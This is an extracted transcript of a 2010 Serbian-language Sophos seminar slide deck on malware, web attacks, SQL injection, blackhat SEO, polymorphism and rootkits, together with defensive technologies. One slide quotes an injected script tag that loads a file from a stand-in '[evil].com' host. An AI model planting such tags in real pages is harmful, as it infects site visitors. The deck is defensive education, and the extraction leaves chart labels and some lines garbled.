anatomija napada – duhovi u mašini
DESCRIPTION
Prezentacija "Anatomija napada – duhovi u mašini" koju je Vanja Švajcer održao na Sophos seminaru u maju 2010. godine.TRANSCRIPT
![Page 1: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/1.jpg)
Vanja Svajcer
Principal Researcher – Sophos
Beograd, 13 Maj 2010
Anatomija napada – duhovi u mašini
![Page 2: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/2.jpg)
Šta radi SophosLabs?
Sakuplja pretnje
Analizira i klasifikuje
Kreira detekcije i otklanja pretnje
Objavljuje sveže definicije i informacije
Istraživanje i razvoj
Nešto više informacija videćemo kasnije
2
![Page 3: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/3.jpg)
SophosLabs u samom centru
![Page 4: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/4.jpg)
4
Anatomija napada
Postavljanje scenarija
Zlonamerni softver (Malware)
Tehnike napada
Proces analize i alati
Tehnologija zaštite
![Page 5: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/5.jpg)
5
Tipovi malicioznog softvera
Virus
Trojanac
Crv (Worm)
![Page 6: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/6.jpg)
Ko se nekada bavio pisanjem virusa?
Nema „standardnog“ pisca virusa, nema „standardnog“ motiva
za pisanje
Školarci
Srednjoškolci
Studenti
IT profesionalci
Uglavnom muškarci
Nikako A/V kompanije
![Page 7: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/7.jpg)
![Page 8: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/8.jpg)
![Page 9: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/9.jpg)
Ko piše malver danas?
Virusi se retko viđaju, ali čini se da opet postaju popularni
U pitanju je novac
U osnovi se svodi na kriminal
( I dalje postoji tamo neki pegavi tinejdžer …)
![Page 10: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/10.jpg)
10
APT
Advanced Persistent Threat
Moderan izraz za “targeted malware”
Mala veličina (oko 100k) i posebne namene
Nema pakovanja
Izgleda kao legitiman Windows fajl
Neovlašćeni prikriveni transfer podataka (Data Exfiltration)
Težak za uklanjanje
![Page 11: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/11.jpg)
11
Email pretnje
Druga polovina 2008. bila je svedok
dramatičnog porasta malvera
u obliku priloga email-a
2009. taj trend se nastavlja,
nekoliko familija se širi agresivnim
masovnim spemovanjem
Iste stare taktike socijalnog inženjeringa
UPS/FedEx failed delivery
reports, Microsoft patches,
Airline e-tickets itd.
![Page 12: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/12.jpg)
12
0% 10% 20% 30% 40%
ThreatMal/Bredo-A
W32/MyDoom-OTroj/Bredo-GTroj/Invo-Zip
Troj/BredoZp-CTroj/Agent-LGEMal/EncPk-KP
Mal/WaledPak-AMal/BredoZp-A
Mal/EncPk-JXOther
15.9%8.9%8.5%
5.8%5.4%4.8%4.7%
3.5%3.3%3.2%
36.0%
Top spemovani malver (2009)
Dominiraju ključne familije malvera
Bredo
Waled
Jednostavno
ali i dalje
radi!
![Page 13: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/13.jpg)
Socijalni inženjering – Bredo
Mal/Bredo
Ista kampanja može obuhvatati brojne “različite” priloge
![Page 14: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/14.jpg)
Socijalni inženjering – Zbot (aka Zeus)
Mal/Zbot
![Page 15: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/15.jpg)
Bredo vs Zbot
Konkurencija između botova!!!
Bredo pokušava da onemogući bilo koji instalirani Zbot
Vrlo slično poput Netsky vs Bagle rata od pre par godina!!!
![Page 16: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/16.jpg)
16
Email pretnje
Globalne spem zamke za praćenje spema
SAD usmerava više spema nego bilo koja druga pojedinačna
država
Kompromitovani računari ne samo što šire spem već
distribuiraju malver i
lansiraju DDoS napade
0% 10% 20% 30% 40% 50%
United StatesBrazilIndia
ChinaRepublic of Korea
TurkeyPoland
VietnamRussian Federation
SpainOther
15%
11%
5%
5%
5%
4%
4%
3%
3%
3%
42%
![Page 17: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/17.jpg)
17
Web najdominantniji
99% inficiranih sistema su legitimni kompromitovani sajtovi
Sajtovi za napad
Botnet C&C korišćenjem HTTP
Napadi i dalje često počinju spemovanjem email-a
![Page 18: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/18.jpg)
18
![Page 19: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/19.jpg)
Napadi Web 2.0 aplikacija
![Page 20: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/20.jpg)
Korak 1: preusmeravanje sa kompromitovanog sajta
Kompromitovani web sajtovi
Attacker-controlled
redirects
Payload
Attack site using
bundle of exploits
![Page 21: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/21.jpg)
21
Kompromitovanje hostova
![Page 22: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/22.jpg)
SQL injection
Hakeri koriste alate da identifikuju
stranice potencijalno ranjive na SQL
injection
Šalju maliciozne HTTP zahteve (Demo)
DBDB
DB
Malicious SQLinjection
![Page 23: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/23.jpg)
SQL injection
SQL injection uzrokuje da baza podataka postane zabiberena
malicioznim skript tagovima
Kao rezultat, stranice na web serveru izgrađene od podataka
preuzetih iz baze takođe sadrže maliciozne skript tagove
<script src=http://[evil].com/file.js
<script src=http:/
<script src=http:/
<script src=http:/
<script src=http:/
<script src=http:/
<script src=http:/
<script src=http:/
![Page 24: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/24.jpg)
SQL injection
Korisnik se kreće web sajtom
Maliciozni skript tag prikriveno učitava
skript sa udaljenog servera
Žrtva postaje inficirana malverom:
Asprox trojan
![Page 25: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/25.jpg)
25
Demo SQLi + XSS
![Page 26: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/26.jpg)
26
Novootkrivene inficirane stranice – april 2010
![Page 27: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/27.jpg)
27
Blackhat SEO
Kompromitovani hostovi zasejani sa SEO-kitovima
Povećavaju rangiranje stranice
![Page 28: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/28.jpg)
SEO trovanje
Pretraga po popularnim rečima
![Page 29: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/29.jpg)
29
Blackhat SEO
![Page 30: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/30.jpg)
30
Blackhat SEO
![Page 31: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/31.jpg)
31
Demo Blackhat SEO
![Page 32: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/32.jpg)
Vidljivost – sajtovi koji hostuju SEO-kitove
![Page 33: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/33.jpg)
Korak 3: Preuzimanje sadržaja sa napadačevog sajta
Kompromitovani web sajtovi
Preusmeravanja koja
kontroliše napadač
Payload
Sajt za napad koristi
više kombinovanih ranjivosti
![Page 34: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/34.jpg)
Web napadi
Izrađen korišćenjem
kupljenih kompleta alata
MPack, IcePack, GPack,
Neosploit, Eleonore, Yes
Konzola za upravljanje
Phishing
Otkriven: 19. oktobra 2009.
Najpogođenije države:
Francuska – 4%
SAD – 17%
Velika Britanija – 3%
Nemačka – 6%
![Page 35: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/35.jpg)
Web napadi
Pregled po programima
za pregled Internet
sadržaja!
Polimorfizam sa
serverske strane
Procenat pogođenih:
MSIE – 12%
FireFox – 1%
Opera – 5%
![Page 36: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/36.jpg)
36
Polimorfizam
![Page 37: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/37.jpg)
37
Polimorfizam
![Page 38: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/38.jpg)
38
Polimorfizam
![Page 39: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/39.jpg)
39
Polimorfizam
![Page 40: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/40.jpg)
40
Polimorfizam
![Page 41: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/41.jpg)
41
Slabosti polimorfnog malvera
Poly-engine je deo koda
Može biti reverzovan od strane upornog istraživača
Mora biti dekriptovan u memoriji
Emulira programski kod dok se ne nađe prava varijanta
Detekcija može biti bazirana po proceduri dekripcije
![Page 42: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/42.jpg)
42
Polimorfizam sa serverske strane
![Page 43: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/43.jpg)
43
Polimorfizam sa serverske strane
![Page 44: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/44.jpg)
44
Polimorfizam sa serverske strane
![Page 45: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/45.jpg)
45
Polimorfizam sa serverske strane
![Page 46: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/46.jpg)
46
Demo SSP
![Page 47: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/47.jpg)
Korak 4: Napadni žrtve kroz ranjivosti, zarazi ih
Kompromitovani web sajtovi
Preusmeravanja koja
kontroliše napadač
Tovar
Sajt za napad koristi
više kombinovanih ranjivosti
![Page 48: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/48.jpg)
Lažni AV profesionalizam
![Page 49: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/49.jpg)
49
Video - scareware
![Page 50: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/50.jpg)
Troj/MacSwp
50
![Page 51: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/51.jpg)
51
Zeus (Zbot)
Komplet za kreiranje botneta i malvera za krađu informacija
Builder
Loader
Control panel
![Page 52: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/52.jpg)
52
Demo Zbot
![Page 53: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/53.jpg)
53
Zeus (Zbot) - tracker
![Page 54: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/54.jpg)
54
Rootkitovi
Programi koji koriste različite tehnike da sakriju svoje prisustvo
na računaru
Trojanci
Legitimni programi?
![Page 55: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/55.jpg)
Šta Rootkitovi rade?
Anti-Virus
skener
Operativni
sistemRootkit
Listanjefajlova
Memo.doc
Sales.xls
Phish.exe
Sophos.ppt
Memo.doc
Sales.xls
Phish.exe
Sophos.ppt
Listanjefajlova
![Page 56: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/56.jpg)
56
Demo rootkit
![Page 57: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/57.jpg)
57
Vrhunski rootkitovi
TDSS (TDL3)
MS10-015 update
![Page 58: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/58.jpg)
Vrhunski rootkitovi – Sinowal (Mebroot)
Inficira MBR (poput starih boot sektor virusa)
Modifikuje OS loader da učita maliciozni drajver
Drajver sakriva maliciozni MBR (stealth)
Instalira prilagođeni mrežni stek
Sadrži backdoor (enkriptovana HTTP komunikacija)
Tovar – ubrizgava maliciozne DLL-ove
Pseudo-nasumično generisanje URL-ova za update (dnevni)
![Page 59: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/59.jpg)
Hard disk
Rootkitovi – Sinowal (Mebroot)
BIOS
initializationMBR Boot loader
Early kernel
initialization
CPU Real mode
BIOS services
Kernel
initialization
CPU Protected mode
User process
Window servicesWindow services
MBR Boot loaderEarly kernel
initializationUser process
Sinowal
dropper
User process
Endpoint
securityRead
MBR
![Page 60: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/60.jpg)
Sinowal geografsko širenje (Sinowal, Feb-Mar 2010)
![Page 61: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/61.jpg)
61
Vrhunski rootkitovi budućnosti
Rootkitovi za virtualizaciju
Softver (Subvirt)
Uz pomoć hardvera (Bluepill, Vitriol)
Bootkitovi (eEye, vBootkit, Stoned)
SMM bazirani rootkitovi
Bios/EFI bazirani rootkitovi?
![Page 62: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/62.jpg)
Rootkitovi za virtualizaciju
Hardver
Aplikacija 1
Aplikacija 2 VMM
OSg1 OSg2
OSRootkit za
virtualizaciju
![Page 63: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/63.jpg)
Rootkitovi za virtualizaciju
Hardver
OSg3
Rootkit za virtualizaciju – maliciozni hipervizor
OSg2OSg1Domen 0
![Page 64: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/64.jpg)
SophosLabs™
![Page 65: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/65.jpg)
65
Pregled
50000
![Page 66: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/66.jpg)
SophosLabs sistemi
![Page 67: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/67.jpg)
67
Demo lab sistemi
![Page 68: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/68.jpg)
68
Tehnologija zaštite
Inspekcija sadržaja (klasično skeniranje)
Detekcija na bazi ponašanja (HIPS)
Reputacija
Domen
Fajl
![Page 69: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/69.jpg)
Životni ciklus familije malvera
Prvi član
porodiceAnaliza Detekcija TEST Objava
Sledeći
član
porodica
![Page 70: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/70.jpg)
Karakteristike familije
Identične osnovne funkcionalnosti
Nove varijante mogu imati dodatne funkcionalnosti
Linije koda se ponovo upotrebljavaju
Nakon rekompilacije, nova varijanta je binarno različita
Tradicionalno skeniranje nije efikasno za proaktivnu detekciju
familije
Zahteva analizu na funkcionalnom nivou
![Page 71: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/71.jpg)
Grafički prikaz aplikativnih zahteva
![Page 72: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/72.jpg)
Spakovan -> Raspakovan
![Page 73: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/73.jpg)
„Runtime behavioral“ zaštita
Nadopunjuje Behavioral Genotype
Proverava ponašanje procesa primenjeno na sistemu
Proverava sve pokrenute procese na znake malicioznih
modifikacija sistemskih objekata
Fajlove
Registry unose
Procese
Mrežne konekcije
Učitane drajvere
![Page 74: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/74.jpg)
Registracija u run ključu
Uprošćena runtime arhitektura
Privileged – kernel mode
Non-privileged – user mode
- Pokreće se proces virus.exe... - Hmmm, OK. Skeniram na viruse… - Ništa nije pronađeno.- Virus.exe otvara registry run ključ...- Zanimljivo. Reci mi nešto više o tome.- Virus.exe se registruje u run ključ…- Hmmm, ne, to nije OK. Blokiraj
operaciju!!!- Operacija blokirana.- Hvala ti kernele!- Izveštavam o ponašanju.
Virus.exe
![Page 75: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/75.jpg)
Buffer overflow zaštita
Generička tehnologija za detekciju zloupotrebe propusta
(uključujući tzv. zero day zloupotrebe)
Nadopunjuje Windows DEP
Detektuje različite buffer overflow napade
Stack
Heap
Return to lib C
Štiti Microsoft i ne-Microsoft procese, uglavnom sa klijentske
strane
![Page 76: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/76.jpg)
Buffer overflow – uprošćena arhitektura
- Preuzimam fajl…- Zanimljivo, odakle dolaziš?- Internet Explorer programski kod.- OK.- Preuzimam fajl2...- Oh, ne opet. Odakle dolaziš?- Stack.- Oh, ne. Buffer overflow detektovan!!!- Suspendujem proces.- Prijavljujem ponašanje.
Iexplore.exe
![Page 77: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/77.jpg)
77
Cloud computing
![Page 78: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/78.jpg)
78
Cloud zaštita
Pretrage u realnom vremenu
Povratne informacije u realnom vremenu (zaštita zajednice)
Socijalno umrežavanje vezano za bezbednost
Premošćavanje prekida u zaštiti
Unapređenje vremena odziva
![Page 79: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/79.jpg)
79
Proaktivno vs reaktivno
![Page 80: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/80.jpg)
80
Zaključak
Malver postaje sve kompleksniji
Finansijska motivacija
Usmereni (targeted) malver može predstavljati izazov
Security zajednica ne gubi bitku
Stalno se razvijaju nove metode
Tehnologija ne predstavlja „srebrni metak“
![Page 81: Anatomija napada – duhovi u mašini](https://reader033.vdocuments.net/reader033/viewer/2022061108/544fb426af7959070a8b743c/html5/thumbnails/81.jpg)
Blog: http://www.sophos.com/blogs/sophoslabs
Twitter: http://twitter.com/sophoslabs
Pitanja?